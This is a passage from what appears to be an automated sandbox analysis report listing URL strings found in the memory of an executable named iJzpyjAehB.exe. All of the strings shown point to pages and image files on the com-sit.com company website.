                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/feed/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/home/feed/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/impressum/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/kontakt/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/kunden-login/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/leistungen/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/leistungen/central-warehouse/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/leistungen/intelligent-sourcing/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/pt-pt/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/ru/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unternehmen/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unternehmen/karriere/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unternehmen/ueber-uns/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2018/11/bg-stripes.png);background-repeat:repeat;backgrou
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2018/11/favicon-comsit.ico
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2018/11/logo-COM-SIT.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2018/11/mehr-erfahren-btn-150x26.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2018/11/mehr-erfahren-btn-50x9.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2018/11/mehr-erfahren-btn.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Home-ACTIVATION_2019-175x146.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Home-ACTIVATION_2019-300x250.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Home-ACTIVATION_2019-50x42.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Home-ACTIVATION_2019-768x639.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Home-ACTIVATION_2019-90x75.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Home-ACTIVATION_2019.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_01_PORSCHE-175x146.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_01_PORSCHE-300x250.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_01_PORSCHE-50x42.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_01_PORSCHE-768x639.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_01_PORSCHE-90x75.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_01_PORSCHE.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_02_BOOK-175x146.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_02_BOOK-300x250.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_02_BOOK-50x42.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_02_BOOK-768x639.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_02_BOOK-90x75.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_02_BOOK.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_03_DELIVERY-175x146.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_03_DELIVERY-300x250.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_03_DELIVERY-50x42.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_03_DELIVERY-768x639.jpg
